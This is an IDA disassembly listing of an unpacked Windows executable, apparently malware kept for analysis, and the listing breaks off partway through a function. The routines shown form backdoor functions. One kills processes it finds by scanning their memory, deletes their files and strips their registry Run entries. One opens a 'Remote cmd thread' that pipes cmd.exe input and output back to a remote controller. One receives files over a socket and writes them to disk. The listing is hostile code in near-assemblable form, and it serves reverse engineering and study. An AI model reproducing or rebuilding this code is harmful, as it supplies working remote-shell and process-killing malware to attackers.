;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : F74066FD8493648586E4C74FBC49C8D5
; File Name : u:\work\f74066fd8493648586e4c74fbc49c8d5_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00010000 ( 65536.)
; Section size in file : 00010000 ( 65536.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg000 segment para public 'CODE' use32
assume cs:seg000
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_40110A+30�p
; sub_40110A+3E�p ...
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = byte ptr -58h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 260h
push ebx
xor ebx, ebx
cmp off_412000, ebx
mov [ebp+var_C], ebx
jz loc_401104
push esi
mov eax, offset off_412000
push edi
mov edi, ds:dword_411008
mov [ebp+var_18], eax
mov esi, 104h
loc_401030: ; CODE XREF: sub_401000+FC�j
push dword ptr [eax]
lea eax, [ebp+var_58]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_58]
push eax
call sub_40AC4E
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
push 3
lea eax, [ebp+var_58]
push ebx
push eax
push [ebp+arg_0]
call ds:dword_411000 ; RegOpenKeyExA
lea eax, [ebp+var_4]
mov [ebp+var_10], ebx
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_260]
mov [ebp+var_14], esi
push eax
mov [ebp+var_4], esi
push ebx
loc_401080: ; CODE XREF: sub_401000+E6�j
push [ebp+var_8]
call edi ; RegEnumValueA
test eax, eax
jnz short loc_4010E8
cmp [ebp+var_1C], 1
jnz short loc_4010BF
push [ebp+arg_4]
lea eax, [ebp+var_15C]
push [ebp+var_4]
push eax
call sub_4052F1
add esp, 0Ch
test eax, eax
jz short loc_4010BF
lea eax, [ebp+var_260]
push eax
push [ebp+var_8]
call ds:dword_411004 ; RegDeleteValueA
test eax, eax
jnz short loc_4010BF
inc [ebp+var_C]
loc_4010BF: ; CODE XREF: sub_401000+8D�j
; sub_401000+A6�j ...
lea eax, [ebp+var_4]
inc [ebp+var_10]
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_260]
mov [ebp+var_14], esi
push eax
mov [ebp+var_4], esi
push [ebp+var_10]
jmp short loc_401080
; ---------------------------------------------------------------------------
loc_4010E8: ; CODE XREF: sub_401000+87�j
push [ebp+var_8]
call ds:dword_411028 ; RegCloseKey
mov eax, [ebp+var_18]
add eax, 4
mov [ebp+var_18], eax
cmp [eax], ebx
jnz loc_401030
pop edi
pop esi
loc_401104: ; CODE XREF: sub_401000+15�j
mov eax, [ebp+var_C]
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40110A proc near ; CODE XREF: sub_4011C4+23B�p
; sub_40735A+42F�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 80h
push esi
call ds:dword_4110B0 ; SetFileAttributesA
test eax, eax
jz loc_4011BF
push esi
call ds:dword_4110B8 ; DeleteFileA
push esi
push 80000001h
call sub_401000
mov ebx, 80000002h
push esi
push ebx
mov edi, eax
call sub_401000
add esp, 10h
add eax, edi
jnz short loc_4011BF
mov edi, 104h
lea eax, [ebp+var_104]
push edi
push esi
push eax
call sub_4052A6
lea eax, [ebp+var_104]
push eax
call sub_410826 ; strlen
add esp, 10h
test eax, eax
jz short loc_40119E
loc_40117A: ; CODE XREF: sub_40110A+78�j
cmp byte ptr [esi+eax-1], 5Ch
jz short loc_401186
dec eax
jnz short loc_40117A
jmp short loc_40119E
; ---------------------------------------------------------------------------
loc_401186: ; CODE XREF: sub_40110A+75�j
lea eax, [ebp+eax+var_104]
push edi
push eax
lea eax, [ebp+var_104]
push eax
call sub_4052A6
add esp, 0Ch
loc_40119E: ; CODE XREF: sub_40110A+6E�j
; sub_40110A+7A�j
lea eax, [ebp+var_104]
push eax
push 80000001h
call sub_401000
lea eax, [ebp+var_104]
push eax
push ebx
call sub_401000
add esp, 10h
loc_4011BF: ; CODE XREF: sub_40110A+1D�j
; sub_40110A+48�j
pop edi
pop esi
pop ebx
leave
retn
sub_40110A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011C4 proc near ; DATA XREF: sub_4014B0+74�o
var_3D0 = byte ptr -3D0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_2C7 = dword ptr -2C7h
var_2C3 = byte ptr -2C3h
var_2C2 = byte ptr -2C2h
var_1C3 = byte ptr -1C3h
var_2B = byte ptr -2Bh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D0h
push 2ACh
lea eax, [ebp+var_2CC]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
add esp, 10h
cmp [ebp+var_2C8], 0
jz short loc_401218
lea eax, [ebp+var_2C3]
push eax
mov eax, [ebp+var_2CC]
push dword ptr [eax]
lea eax, [ebp+var_1C3]
push offset dword_412144
push eax
call sub_408D50
add esp, 10h
loc_401218: ; CODE XREF: sub_4011C4+2F�j
push ebx
push esi
call sub_403F1D
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jz loc_40149C
push edi
push 10000h
call sub_41082C ; malloc
cmp [esi], ebx
pop ecx
mov [ebp+arg_0], eax
mov [ebp+var_8], ebx
mov [ebp+var_10], ebx
jle loc_40143E
xor edi, edi
loc_40124A: ; CODE XREF: sub_4011C4+269�j
call ds:dword_4110F0 ; GetCurrentProcessId
mov ecx, [esi+4]
cmp [edi+ecx], eax
jz loc_40141F
lea eax, [ebp+var_3D0]
push 104h
push eax
push ebx
call ds:dword_411094 ; GetModuleHandleA
push eax
call ds:dword_411098 ; GetModuleFileNameA
mov eax, [esi+4]
lea eax, [edi+eax+0Ch]
push eax
lea eax, [ebp+var_3D0]
push eax
call sub_410C94 ; _strcmpi
pop ecx
test eax, eax
pop ecx
jz loc_40141F
mov eax, [esi+4]
push dword ptr [edi+eax]
mov al, [ebp+var_2C8]
neg al
sbb eax, eax
push ebx
add eax, 11h
push eax
call ds:dword_41109C ; OpenProcess
cmp eax, ebx
mov [ebp+var_4], eax
jz loc_40141F
xor edx, edx
mov [ebp+var_C], ebx
mov [ebp+var_20], edx
loc_4012C2: ; CODE XREF: sub_4011C4+1DA�j
mov eax, [esi+4]
mov [ebp+var_18], 10000h
add eax, edi
mov ecx, [eax+8]
sub ecx, edx
cmp ecx, 10000h
ja short loc_4012DE
mov [ebp+var_18], ecx
loc_4012DE: ; CODE XREF: sub_4011C4+115�j
mov eax, [eax+4]
lea ecx, [ebp+var_C]
push ecx
add eax, edx
push [ebp+var_18]
push [ebp+arg_0]
push eax
push [ebp+var_4]
call ds:dword_4110A0 ; ReadProcessMemory
test eax, eax
jz loc_40138A
cmp [ebp+var_C], ebx
jz loc_40138A
xor ecx, ecx
loc_40130A: ; CODE XREF: sub_4011C4+1B9�j
mov eax, [ebp+arg_0]
mov al, [ecx+eax]
cmp al, [ebp+var_2C3]
jz short loc_401330
movsx edx, al
movsx eax, [ebp+var_2C3]
lea ebx, [eax+20h]
cmp edx, ebx
jz short loc_401330
add eax, 0FFFFFFE0h
cmp edx, eax
jnz short loc_401371
loc_401330: ; CODE XREF: sub_4011C4+152�j
; sub_4011C4+163�j
lea eax, [ebp+var_2C2]
mov [ebp+var_14], eax
mov eax, [ebp+arg_0]
lea eax, [ecx+eax+1]
mov [ebp+var_1C], eax
loc_401343: ; CODE XREF: sub_4011C4+1AB�j
mov eax, [ebp+var_14]
mov dl, [eax]
test dl, dl
jz short loc_401381
mov eax, [ebp+var_1C]
mov al, [eax]
cmp dl, al
jz short loc_401369
movsx eax, al
movsx edx, dl
lea ebx, [eax+20h]
cmp edx, ebx
jz short loc_401369
add eax, 0FFFFFFE0h
cmp edx, eax
jnz short loc_401371
loc_401369: ; CODE XREF: sub_4011C4+18F�j
; sub_4011C4+19C�j
inc [ebp+var_1C]
inc [ebp+var_14]
jmp short loc_401343
; ---------------------------------------------------------------------------
loc_401371: ; CODE XREF: sub_4011C4+16A�j
; sub_4011C4+1A3�j
mov eax, [ebp+var_C]
inc ecx
sub eax, [ebp+var_2C7]
cmp ecx, eax
jbe short loc_40130A
jmp short loc_40138A
; ---------------------------------------------------------------------------
loc_401381: ; CODE XREF: sub_4011C4+186�j
mov eax, [ebp+arg_0]
add ecx, eax
test ecx, ecx
jnz short loc_4013A3
loc_40138A: ; CODE XREF: sub_4011C4+135�j
; sub_4011C4+13E�j ...
mov edx, [ebp+var_20]
mov eax, [esi+4]
add edx, [ebp+var_18]
cmp edx, [edi+eax+8]
mov [ebp+var_20], edx
jz short loc_401414
xor ebx, ebx
jmp loc_4012C2
; ---------------------------------------------------------------------------
loc_4013A3: ; CODE XREF: sub_4011C4+1C4�j
inc [ebp+var_8]
cmp [ebp+var_2C8], 0
jz short loc_4013EC
push 3E8h
call ds:dword_4110A4 ; Sleep
mov bl, [ebp+var_2B]
and [ebp+var_2B], 0
mov eax, [esi+4]
add eax, edi
push dword ptr [eax]
add eax, 0Ch
push eax
lea eax, [ebp+var_2C3]
push eax
lea eax, [ebp+var_1C3]
push offset dword_41211C
push eax
call sub_408D50
add esp, 14h
mov [ebp+var_2B], bl
jmp short loc_401405
; ---------------------------------------------------------------------------
loc_4013EC: ; CODE XREF: sub_4011C4+1E9�j
push 0
push [ebp+var_4]
call ds:dword_4110A8 ; TerminateProcess
mov eax, [esi+4]
lea eax, [edi+eax+0Ch]
push eax
call sub_40110A
pop ecx
loc_401405: ; CODE XREF: sub_4011C4+226�j
mov eax, [ebp+var_2CC]
xor ebx, ebx
cmp [eax+4], ebx
jnz short loc_401435
jmp short loc_401416
; ---------------------------------------------------------------------------
loc_401414: ; CODE XREF: sub_4011C4+1D6�j
xor ebx, ebx
loc_401416: ; CODE XREF: sub_4011C4+24E�j
push [ebp+var_4]
call ds:dword_4110AC ; CloseHandle
loc_40141F: ; CODE XREF: sub_4011C4+92�j
; sub_4011C4+CA�j ...
inc [ebp+var_10]
add edi, 114h
mov eax, [ebp+var_10]
cmp eax, [esi]
jl loc_40124A
jmp short loc_40143E
; ---------------------------------------------------------------------------
loc_401435: ; CODE XREF: sub_4011C4+24C�j
push [ebp+var_4]
call ds:dword_4110AC ; CloseHandle
loc_40143E: ; CODE XREF: sub_4011C4+7E�j
; sub_4011C4+26F�j
push esi
call sub_404138
push [ebp+arg_0]
call sub_410832 ; free
cmp [ebp+var_2C8], 0
pop ecx
pop ecx
pop edi
jz short loc_40149C
push 3E8h
call ds:dword_4110A4 ; Sleep
cmp [ebp+var_8], ebx
lea eax, [ebp+var_2C3]
push eax
jnz short loc_401485
lea eax, [ebp+var_1C3]
push offset dword_4120F8
push eax
call sub_408D50
add esp, 0Ch
jmp short loc_40149C
; ---------------------------------------------------------------------------
loc_401485: ; CODE XREF: sub_4011C4+2A9�j
push [ebp+var_8]
lea eax, [ebp+var_1C3]
push offset dword_4120CC
push eax
loc_401494: ; DATA XREF: .data:off_414C48�o
call sub_408D50
add esp, 10h
loc_40149C: ; CODE XREF: sub_4011C4+61�j
; sub_4011C4+292�j ...
push [ebp+var_2CC]
call sub_406753
pop ecx
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_4011C4 endp
; =============== S U B R O U T I N E =======================================
sub_4014B0 proc near ; CODE XREF: sub_40735A+450�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_401531
push edi
call sub_410826 ; strlen
test eax, eax
pop ecx
jz short loc_401531
push 2ACh
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_401531
push ebx
mov bl, [esp+0Ch+arg_8]
push edi
mov [esi+4], bl
call sub_410826 ; strlen
mov [esi+5], eax
mov [esp+10h+var_10], 100h
lea eax, [esi+9]
push edi
push eax
call sub_41083E ; strncpy
push [esp+18h+arg_0]
lea eax, [esi+109h]
push eax
call sub_403E60
add esp, 14h
mov eax, offset aListing ; "Listing"
test bl, bl
pop ebx
jnz short loc_40151A
mov eax, offset aKilling ; "Killing"
loc_40151A: ; CODE XREF: sub_4014B0+63�j
push edi
push eax
push offset dword_412174
push 0
push esi
push offset sub_4011C4
call sub_40663C
add esp, 18h
loc_401531: ; CODE XREF: sub_4014B0+8�j
; sub_4014B0+13�j ...
pop edi
pop esi
retn
sub_4014B0 endp
; =============== S U B R O U T I N E =======================================
sub_401534 proc near ; CODE XREF: sub_401621:loc_40188D�p
mov eax, dword_417B54
push esi
mov esi, ds:dword_4110AC
cmp eax, 0FFFFFFFFh
jz short loc_401548
push eax
call esi ; CloseHandle
loc_401548: ; CODE XREF: sub_401534+F�j
mov eax, dword_417B48
cmp eax, 0FFFFFFFFh
jz short loc_401555
push eax
call esi ; CloseHandle
loc_401555: ; CODE XREF: sub_401534+1C�j
mov eax, dword_417B4C
cmp eax, 0FFFFFFFFh
jz short loc_401562
push eax
call esi ; CloseHandle
loc_401562: ; CODE XREF: sub_401534+29�j
mov eax, dword_417B50
cmp eax, 0FFFFFFFFh
jz short loc_40156F
push eax
call esi ; CloseHandle
loc_40156F: ; CODE XREF: sub_401534+36�j
pop esi
retn
sub_401534 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401571 proc near ; CODE XREF: sub_401621+228�p
; sub_401621+252�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 200h
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+189h], 0
jnz short loc_401590
cmp byte ptr [esi+18Dh], 0
jz short loc_4015CE
loc_401590: ; CODE XREF: sub_401571+14�j
; sub_401571+49�j ...
push 32h
call ds:dword_4110A4 ; Sleep
cmp byte ptr [esi+189h], 0
jz short loc_4015B3
call sub_41084A ; clock
sub eax, dword_417B5C
cmp eax, 1F4h
jnb short loc_4015CE
loc_4015B3: ; CODE XREF: sub_401571+2E�j
cmp byte ptr [esi+18Dh], 0
jz short loc_401590
call sub_41084A ; clock
sub eax, dword_417B5C
cmp eax, 0FAh
jb short loc_401590
loc_4015CE: ; CODE XREF: sub_401571+1D�j
; sub_401571+40�j
call sub_41084A ; clock
mov ecx, [ebp+arg_4]
mov dword_417B5C, eax
mov al, [ecx]
cmp al, 0Ah
jz short loc_4015FC
cmp al, 0Dh
jz short loc_4015FC
push 200h
lea eax, [ebp+var_200]
push ecx
push eax
call sub_4052A6
add esp, 0Ch
jmp short loc_40160F
; ---------------------------------------------------------------------------
loc_4015FC: ; CODE XREF: sub_401571+6E�j
; sub_401571+72�j
lea eax, [ebp+var_200]
push offset dword_4121A4
push eax
call sub_410844 ; sprintf
pop ecx
pop ecx
loc_40160F: ; CODE XREF: sub_401571+89�j
lea eax, [ebp+var_200]
push eax
push esi
call sub_408D50
pop ecx
pop ecx
pop esi
leave
retn
sub_401571 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401621 proc near ; DATA XREF: sub_4018D5+73�o
var_724 = byte ptr -724h
var_620 = byte ptr -620h
var_420 = dword ptr -420h
var_21C = byte ptr -21Ch
var_78 = dword ptr -78h
var_4C = dword ptr -4Ch
var_48 = word ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 724h
push ebx
push esi
push edi
push 3A7h
push [ebp+arg_0]
lea eax, [ebp+var_420]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
add esp, 10h
call sub_41084A ; clock
sub eax, 1F4h
xor esi, esi
mov dword_417B5C, eax
lea eax, [ebp+var_724]
push esi
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call ds:dword_411074 ; SearchPathA
test eax, eax
jz loc_401892
push 1
lea eax, [ebp+var_20]
pop ebx
mov edi, ds:dword_411078
push esi
push eax
lea eax, [ebp+var_10]
mov [ebp+var_20], 0Ch
push eax
lea eax, [ebp+var_14]
push eax
mov [ebp+var_18], ebx
mov [ebp+var_1C], esi
call edi ; CreatePipe
test eax, eax
jz loc_40188D
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_40188D
mov edi, ds:dword_4110F8
push 3
push esi
push esi
push offset dword_417B50
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_411080 ; DuplicateHandle
test eax, eax
jz loc_40188D
push 10h
lea eax, [ebp+var_34]
push esi
push eax
call sub_410850 ; memset
push 44h
lea eax, [ebp+var_78]
pop edi
push edi
push esi
push eax
call sub_410850 ; memset
mov eax, [ebp+var_C]
add esp, 18h
mov [ebp+var_40], eax
mov eax, [ebp+var_10]
mov [ebp+var_3C], eax
mov [ebp+var_38], eax
lea eax, [ebp+var_34]
mov [ebp+var_78], edi
push eax
lea eax, [ebp+var_78]
push eax
push esi
push esi
push esi
push ebx
push esi
push esi
lea eax, [ebp+var_724]
push offset byte_417B60
push eax
mov [ebp+var_4C], 101h
mov [ebp+var_48], si
call ds:dword_411084 ; CreateProcessA
test eax, eax
jz loc_40188D
push [ebp+var_C]
mov edi, ds:dword_4110AC
call edi ; CloseHandle
mov eax, [ebp+var_14]
push [ebp+var_30]
mov dword_417B54, eax
mov eax, [ebp+var_8]
mov dword_417B48, eax
mov eax, [ebp+var_34]
mov dword_417B4C, eax
call edi ; CloseHandle
mov eax, [ebp+var_420]
mov [ebp+var_4], esi
cmp [eax+4], esi
jnz loc_40188D
mov edi, 200h
mov ebx, 103h
loc_40178F: ; CODE XREF: sub_401621+238�j
push edi
lea eax, [ebp+var_620]
push esi
push eax
call sub_410850 ; memset
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push esi
push eax
lea eax, [ebp+var_620]
push edi
push eax
push dword_417B54
call ds:dword_411088 ; PeekNamedPipe
test eax, eax
jz loc_401867
cmp [ebp+var_4], esi
jnz short loc_4017F1
lea eax, [ebp+arg_0]
mov [ebp+arg_0], ebx
push eax
push dword_417B4C
call ds:dword_41108C ; GetExitCodeProcess
test eax, eax
jz short loc_4017E7
cmp [ebp+arg_0], ebx
jnz loc_40187A
loc_4017E7: ; CODE XREF: sub_401621+1BB�j
push 0Ah
call ds:dword_4110A4 ; Sleep
jmp short loc_401850
; ---------------------------------------------------------------------------
loc_4017F1: ; CODE XREF: sub_401621+1A4�j
xor eax, eax
cmp [ebp+var_4], esi
jbe short loc_401808
loc_4017F8: ; CODE XREF: sub_401621+1E5�j
cmp [ebp+eax+var_620], 0Ah
jz short loc_401861
inc eax
cmp eax, [ebp+var_4]
jb short loc_4017F8
loc_401808: ; CODE XREF: sub_401621+1D5�j
mov [ebp+var_4], edi
loc_40180B: ; CODE XREF: sub_401621+244�j
push edi
lea eax, [ebp+var_620]
push esi
push eax
call sub_410850 ; memset
add esp, 0Ch
lea eax, [ebp+var_24]
push esi
push eax
push [ebp+var_4]
lea eax, [ebp+var_620]
push eax
push dword_417B54
call ds:dword_411090 ; ReadFile
test eax, eax
jz short loc_40188D
lea eax, [ebp+var_620]
push eax
lea eax, [ebp+var_21C]
push eax
call sub_401571
pop ecx
pop ecx
loc_401850: ; CODE XREF: sub_401621+1CE�j
mov eax, [ebp+var_420]
cmp [eax+4], esi
jz loc_40178F
jmp short loc_40188D
; ---------------------------------------------------------------------------
loc_401861: ; CODE XREF: sub_401621+1DF�j
inc eax
mov [ebp+var_4], eax
jmp short loc_40180B
; ---------------------------------------------------------------------------
loc_401867: ; CODE XREF: sub_401621+19B�j
lea eax, [ebp+var_21C]
push offset aCouldNotReadDa ; "Could not read data from process."
push eax
call sub_401571
jmp short loc_40188B
; ---------------------------------------------------------------------------
loc_40187A: ; CODE XREF: sub_401621+1C0�j
lea eax, [ebp+var_21C]
push offset aCmd_exeProcess ; "Cmd.exe process has terminated."
push eax
call sub_408D50
loc_40188B: ; CODE XREF: sub_401621+257�j
pop ecx
pop ecx
loc_40188D: ; CODE XREF: sub_401621+85�j
; sub_401621+9C�j ...
call sub_401534
loc_401892: ; CODE XREF: sub_401621+58�j
push [ebp+var_420]
call sub_406753
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_401621 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018A7 proc near ; CODE XREF: sub_4018D5+90�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_410826 ; strlen
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push dword_417B50
call ds:dword_411070 ; WriteFile
neg eax
sbb eax, eax
neg eax
leave
retn
sub_4018A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018D5 proc near ; CODE XREF: sub_40735A+1054�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
push esi
cmp [eax+198h], bl
push edi
jz short loc_401905
cmp [ebp+arg_4], ebx
jz loc_401980
push ebx
push ebx
push ebx
push [ebp+arg_4]
push offset aOpen ; "open"
push ebx
call ds:dword_4111E4
jmp short loc_401980
; ---------------------------------------------------------------------------
loc_401905: ; CODE XREF: sub_4018D5+11�j
push 3A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
cmp esi, ebx
jz short loc_401980
mov edi, [ebp+arg_4]
cmp edi, ebx
jz short loc_40192F
push 200h
lea eax, [esi+4]
push edi
push eax
call sub_4052A6
add esp, 0Ch
loc_40192F: ; CODE XREF: sub_4018D5+46�j
push [ebp+arg_0]
lea eax, [esi+204h]
push eax
call sub_403E60
pop ecx
pop ecx
push offset aRemoteCmdThrea ; "Remote cmd thread"
push 1
push esi
push offset sub_401621
call sub_40663C
add esp, 10h
cmp edi, ebx
jz short loc_401980
push offset asc_412214 ; "\r\n"
push edi
call sub_410856 ; _mbscat
push edi
call sub_4018A7
add esp, 0Ch
test eax, eax
jnz short loc_401980
push offset aErrorWhileExec ; "Error while executing command."
push [ebp+arg_0]
call sub_408D50
pop ecx
pop ecx
loc_401980: ; CODE XREF: sub_4018D5+16�j
; sub_4018D5+2E�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4018D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401985 proc near ; DATA XREF: sub_401EA8+E9�o
var_604 = qword ptr -604h
var_5FC = qword ptr -5FCh
var_5E8 = byte ptr -5E8h
var_3E8 = dword ptr -3E8h
var_3E4 = byte ptr -3E4h
var_3C3 = byte ptr -3C3h
var_2BF = byte ptr -2BFh
var_1BF = byte ptr -1BFh
var_1B5 = byte ptr -1B5h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5E8h
push esi
push 3D6h
push [ebp+arg_0]
lea eax, [ebp+var_3E8]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
add esp, 10h
lea eax, [ebp+var_3C3]
push eax
call ds:dword_4110B8 ; DeleteFileA
lea eax, [ebp+var_3C3]
push offset dword_4122AC
push eax
call sub_41086E ; fopen
xor esi, esi
pop ecx
cmp eax, esi
pop ecx
mov [ebp+var_10], eax
jnz short loc_4019E4
push [ebp+var_3E8]
call sub_406753
jmp short loc_401A1B
; ---------------------------------------------------------------------------
loc_4019E4: ; CODE XREF: sub_401985+50�j
push 2710h
lea eax, [ebp+var_1BF]
push esi
push eax
lea eax, [ebp+var_2BF]
push eax
call sub_403BBB
add esp, 10h
cmp eax, esi
mov [ebp+var_C], eax
jnz short loc_401A23
push [ebp+var_10]
call sub_410868 ; fclose
push [ebp+var_3E8]
call sub_406753
pop ecx
loc_401A1B: ; CODE XREF: sub_401985+5D�j
pop ecx
xor eax, eax
jmp loc_401B7C
; ---------------------------------------------------------------------------
loc_401A23: ; CODE XREF: sub_401985+80�j
push ebx
lea eax, [ebp+var_3E4]
push edi
push eax
lea eax, [ebp+var_3C3]
push eax
mov eax, [ebp+var_3E8]
push dword ptr [eax]
lea eax, [ebp+var_1B5]
push offset dword_412280
push eax
call sub_408D50
add esp, 14h
call sub_41084A ; clock
mov ebx, ds:dword_411258
mov [ebp+var_4], esi
push esi
mov [ebp+arg_0], eax
mov esi, 200h
lea eax, [ebp+var_5E8]
push esi
push eax
push [ebp+var_C]
loc_401A71: ; CODE XREF: sub_401985+14B�j
call ebx ; recv
mov edi, eax
test edi, edi
jz short loc_401AD2
cmp edi, esi
ja short loc_401AD2
add [ebp+var_4], edi
push [ebp+var_4]
call ds:dword_41125C ; htonl
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push 4
push eax
push [ebp+var_C]
call sub_403D54
push [ebp+var_10]
lea eax, [ebp+var_5E8]
push edi
push 1
push eax
call sub_410862 ; fwrite
add esp, 1Ch
cmp edi, esi
jb short loc_401AD2
mov eax, [ebp+var_3E8]
cmp dword ptr [eax+4], 0
jnz loc_401B5A
push 0
lea eax, [ebp+var_5E8]
push esi
push eax
push [ebp+var_C]
jmp short loc_401A71
; ---------------------------------------------------------------------------
loc_401AD2: ; CODE XREF: sub_401985+F2�j
; sub_401985+F6�j ...
push [ebp+var_10]
call sub_41085C ; ftell
pop ecx
mov esi, eax
call sub_41084A ; clock
cmp [ebp+arg_0], eax
jnz short loc_401AF0
call sub_41084A ; clock
dec eax
mov [ebp+arg_0], eax
loc_401AF0: ; CODE XREF: sub_401985+160�j
mov eax, esi
mov ecx, 400h
cdq
idiv ecx
mov [ebp+var_8], eax
fild [ebp+var_8]
fstp [ebp+var_4]
call sub_41084A ; clock
sub eax, [ebp+arg_0]
push ecx
push ecx
mov [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:flt_411280
fdivr [ebp+var_4]
fstp [esp+5FCh+var_5FC]
call sub_41084A ; clock
sub eax, [ebp+arg_0]
push ecx
push ecx
mov [ebp+arg_0], eax
lea eax, [ebp+var_3E4]
fild [ebp+arg_0]
fmul ds:flt_411280
fstp [esp+604h+var_604]
push eax
lea eax, [ebp+var_3C3]
push eax
lea eax, [ebp+var_1B5]
push offset dword_412234
push eax
call sub_408D50
add esp, 20h
loc_401B5A: ; CODE XREF: sub_401985+138�j
push [ebp+var_10]
call sub_410868 ; fclose
push [ebp+var_C]
call sub_403D27
push [ebp+var_3E8]
call sub_406753
add esp, 0Ch
xor eax, eax
pop edi
pop ebx
loc_401B7C: ; CODE XREF: sub_401985+99�j
pop esi
leave
retn 4
sub_401985 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B81 proc near ; DATA XREF: sub_401FA3+65�o
var_A1C = qword ptr -0A1Ch
var_A14 = qword ptr -0A14h
var_A00 = byte ptr -0A00h
var_5FC = byte ptr -5FCh
var_3FC = byte ptr -3FCh
var_2F8 = dword ptr -2F8h
var_2F4 = byte ptr -2F4h
var_2D3 = byte ptr -2D3h
var_2D2 = byte ptr -2D2h
var_1CF = byte ptr -1CFh
var_2C = byte ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A00h
push ebx
push esi
push edi
push 2CCh
push [ebp+arg_0]
lea eax, [ebp+var_2F8]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
